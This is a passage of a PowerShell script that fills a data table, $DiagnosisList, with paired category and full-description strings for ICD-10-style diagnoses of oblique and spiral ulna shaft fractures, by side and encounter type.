fracture of shaft of left ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left ulna","Displaced oblique fracture of shaft of left ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left ulna","Displaced oblique fracture of shaft of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left ulna","Displaced oblique fracture of shaft of left ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left ulna","Displaced oblique fracture of shaft of left ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left ulna","Displaced oblique fracture of shaft of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left ulna","Displaced oblique fracture of shaft of left ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left ulna","Displaced oblique fracture of shaft of left ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left ulna","Displaced oblique fracture of shaft of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left ulna","Displaced oblique fracture of shaft of left ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left ulna","Displaced oblique fracture of shaft of left ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left ulna","Displaced oblique fracture of shaft of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left ulna","Displaced oblique fracture of shaft of left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified ulna","Displaced oblique fracture of shaft of unspecified ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified ulna","Displaced oblique fracture of shaft of unspecified ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified ulna","Displaced oblique fracture of shaft of unspecified ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified ulna","Displaced oblique fracture of shaft of unspecified ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified ulna","Displaced oblique fracture of shaft of unspecified ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified ulna","Displaced oblique fracture of shaft of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified ulna","Displaced oblique fracture of shaft of unspecified ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified ulna","Displaced oblique fracture of shaft of unspecified ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified ulna","Displaced oblique fracture of shaft of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified ulna","Displaced oblique fracture of shaft of unspecified ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified ulna","Displaced oblique fracture of shaft of unspecified ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified ulna","Displaced oblique fracture of shaft of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified ulna","Displaced oblique fracture of shaft of unspecified ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified ulna","Displaced oblique fracture of shaft of unspecified ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified ulna","Displaced oblique fracture of shaft of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified ulna","Displaced oblique fracture of shaft of unspecified ulna, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right ulna","Nondisplaced oblique fracture of shaft of right ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right ulna","Nondisplaced oblique fracture of shaft of right ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right ulna","Nondisplaced oblique fracture of shaft of right ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right ulna","Nondisplaced oblique fracture of shaft of right ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right ulna","Nondisplaced oblique fracture of shaft of right ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right ulna","Nondisplaced oblique fracture of shaft of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right ulna","Nondisplaced oblique fracture of shaft of right ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right ulna","Nondisplaced oblique fracture of shaft of right ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right ulna","Nondisplaced oblique fracture of shaft of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right ulna","Nondisplaced oblique fracture of shaft of right ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right ulna","Nondisplaced oblique fracture of shaft of right ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right ulna","Nondisplaced oblique fracture of shaft of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right ulna","Nondisplaced oblique fracture of shaft of right ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right ulna","Nondisplaced oblique fracture of shaft of right ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right ulna","Nondisplaced oblique fracture of shaft of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right ulna","Nondisplaced oblique fracture of shaft of right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left ulna","Nondisplaced oblique fracture of shaft of left ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left ulna","Nondisplaced oblique fracture of shaft of left ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left ulna","Nondisplaced oblique fracture of shaft of left ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left ulna","Nondisplaced oblique fracture of shaft of left ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left ulna","Nondisplaced oblique fracture of shaft of left ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left ulna","Nondisplaced oblique fracture of shaft of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left ulna","Nondisplaced oblique fracture of shaft of left ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left ulna","Nondisplaced oblique fracture of shaft of left ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left ulna","Nondisplaced oblique fracture of shaft of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left ulna","Nondisplaced oblique fracture of shaft of left ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left ulna","Nondisplaced oblique fracture of shaft of left ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left ulna","Nondisplaced oblique fracture of shaft of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left ulna","Nondisplaced oblique fracture of shaft of left ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left ulna","Nondisplaced oblique fracture of shaft of left ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left ulna","Nondisplaced oblique fracture of shaft of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left ulna","Nondisplaced oblique fracture of shaft of left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified ulna","Nondisplaced oblique fracture of shaft of unspecified ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified ulna","Nondisplaced oblique fracture of shaft of unspecified ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified ulna","Nondisplaced oblique fracture of shaft of unspecified ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified ulna","Nondisplaced oblique fracture of shaft of unspecified ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified ulna","Nondisplaced oblique fracture of shaft of unspecified ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified ulna","Nondisplaced oblique fracture of shaft of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified ulna","Nondisplaced oblique fracture of shaft of unspecified ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified ulna","Nondisplaced oblique fracture of shaft of unspecified ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified ulna","Nondisplaced oblique fracture of shaft of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified ulna","Nondisplaced oblique fracture of shaft of unspecified ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified ulna","Nondisplaced oblique fracture of shaft of unspecified ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified ulna","Nondisplaced oblique fracture of shaft of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified ulna","Nondisplaced oblique fracture of shaft of unspecified ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified ulna","Nondisplaced oblique fracture of shaft of unspecified ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified ulna","Nondisplaced oblique fracture of shaft of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified ulna","Nondisplaced oblique fracture of shaft of unspecified ulna, sequela") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, right arm","Displaced spiral fracture of shaft of ulna, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, right arm","Displaced spiral fracture of shaft of ulna, right arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, right arm","Displaced spiral fracture of shaft of ulna, right arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, right arm","Displaced spiral fracture of shaft of ulna, right arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, right arm","Displaced spiral fracture of shaft of ulna, right arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, right arm","Displaced spiral fracture of shaft of ulna, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, right arm","Displaced spiral fracture of shaft of ulna, right arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, right arm","Displaced spiral fracture of shaft of ulna, right arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, right arm","Displaced spiral fracture of shaft of ulna, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, right arm","Displaced spiral fracture of shaft of ulna, right arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, right arm","Displaced spiral fracture of shaft of ulna, right arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, right arm","Displaced spiral fracture of shaft of ulna, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, right arm","Displaced spiral fracture of shaft of ulna, right arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, right arm","Displaced spiral fracture of shaft of ulna, right arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, right arm","Displaced spiral fracture of shaft of ulna, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, right arm","Displaced spiral fracture of shaft of ulna, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, left arm","Displaced spiral fracture of shaft of ulna, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, left arm","Displaced spiral fracture of shaft of ulna, left arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, left arm","Displaced spiral fracture of shaft of ulna, left arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, left arm","Displaced spiral fracture of shaft of ulna, left arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, left arm","Displaced spiral fracture of shaft of ulna, left arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, left arm","Displaced spiral fracture of shaft of ulna, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, left arm","Displaced spiral fracture of shaft of ulna, left arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, left arm","Displaced spiral fracture of shaft of ulna, left arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, left arm","Displaced spiral fracture of shaft of ulna, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, left arm","Displaced spiral fracture of shaft of ulna, left arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, left arm","Displaced spiral fracture of shaft of ulna, left arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, left arm","Displaced spiral fracture of shaft of ulna, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, left arm","Displaced spiral fracture of shaft of ulna, left arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, left arm","Displaced spiral fracture of shaft of ulna, left arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, left arm","Displaced spiral fracture of shaft of ulna, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, left arm","Displaced spiral fracture of shaft of ulna, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, unspecified arm","Displaced spiral fracture of shaft of ulna, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, unspecified arm","Displaced spiral fracture of shaft of ulna, unspecified arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, unspecified arm","Displaced spiral fracture of shaft of ulna, unspecified arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, unspecified arm","Displaced spiral fracture of shaft of ulna, unspecified arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, unspecified arm","Displaced spiral fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, unspecified arm","Displaced spiral fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, unspecified arm","Displaced spiral fracture of shaft of ulna, unspecified arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, unspecified arm","Displaced spiral fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, unspecified arm","Displaced spiral fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, unspecified arm","Displaced spiral fracture of shaft of ulna, unspecified arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, unspecified arm","Displaced spiral fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, unspecified arm","Displaced spiral fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, unspecified arm","Displaced spiral fracture of shaft of ulna, unspecified arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, unspecified arm","Displaced spiral fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, unspecified arm","Displaced spiral fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of ulna, unspecified arm","Displaced spiral fracture of shaft of ulna, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, right arm","Nondisplaced spiral fracture of shaft of ulna, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, right arm","Nondisplaced spiral fracture of shaft of ulna, right arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, right arm","Nondisplaced spiral fracture of shaft of ulna, right arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, right arm","Nondisplaced spiral fracture of shaft of ulna, right arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, right arm","Nondisplaced spiral fracture of shaft of ulna, right arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, right arm","Nondisplaced spiral fracture of shaft of ulna, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, right arm","Nondisplaced spiral fracture of shaft of ulna, right arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, right arm","Nondisplaced spiral fracture of shaft of ulna, right arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, right arm","Nondisplaced spiral fracture of shaft of ulna, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, right arm","Nondisplaced spiral fracture of shaft of ulna, right arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, right arm","Nondisplaced spiral fracture of shaft of ulna, right arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, right arm","Nondisplaced spiral fracture of shaft of ulna, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, right arm","Nondisplaced spiral fracture of shaft of ulna, right arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, right arm","Nondisplaced spiral fracture of shaft of ulna, right arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, right arm","Nondisplaced spiral fracture of shaft of ulna, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, right arm","Nondisplaced spiral fracture of shaft of ulna, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, left arm","Nondisplaced spiral fracture of shaft of ulna, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, left arm","Nondisplaced spiral fracture of shaft of ulna, left arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, left arm","Nondisplaced spiral fracture of shaft of ulna, left arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, left arm","Nondisplaced spiral fracture of shaft of ulna, left arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, left arm","Nondisplaced spiral fracture of shaft of ulna, left arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, left arm","Nondisplaced spiral fracture of shaft of ulna, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, left arm","Nondisplaced spiral fracture of shaft of ulna, left arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, left arm","Nondisplaced spiral fracture of shaft of ulna, left arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, left arm","Nondisplaced spiral fracture of shaft of ulna, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, left arm","Nondisplaced spiral fracture of shaft of ulna, left arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, left arm","Nondisplaced spiral fracture of shaft of ulna, left arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, left arm","Nondisplaced spiral fracture of shaft of ulna, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, left arm","Nondisplaced spiral fracture of shaft of ulna, left arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, left arm","Nondisplaced spiral fracture of shaft of ulna, left arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, left arm","Nondisplaced spiral fracture of shaft of ulna, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, left arm","Nondisplaced spiral fracture of shaft of ulna, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, unspecified arm","Nondisplaced spiral fracture of shaft of ulna, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, unspecified arm","Nondisplaced spiral fracture of shaft of ulna, unspecified arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, unspecified arm","Nondisplaced spiral fracture of shaft of ulna, unspecified arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, unspecified arm","Nondisplaced spiral fracture of shaft of ulna, unspecified arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, unspecified arm","Nondisplaced spiral fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, unspecified arm","Nondisplaced spiral fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, unspecified arm","Nondisplaced spiral fracture of shaft of ulna, unspecified arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, unspecified arm","Nondisplaced spiral fracture of shaft of ulna, unspecified arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of ulna, unspecified arm","Nondisplaced 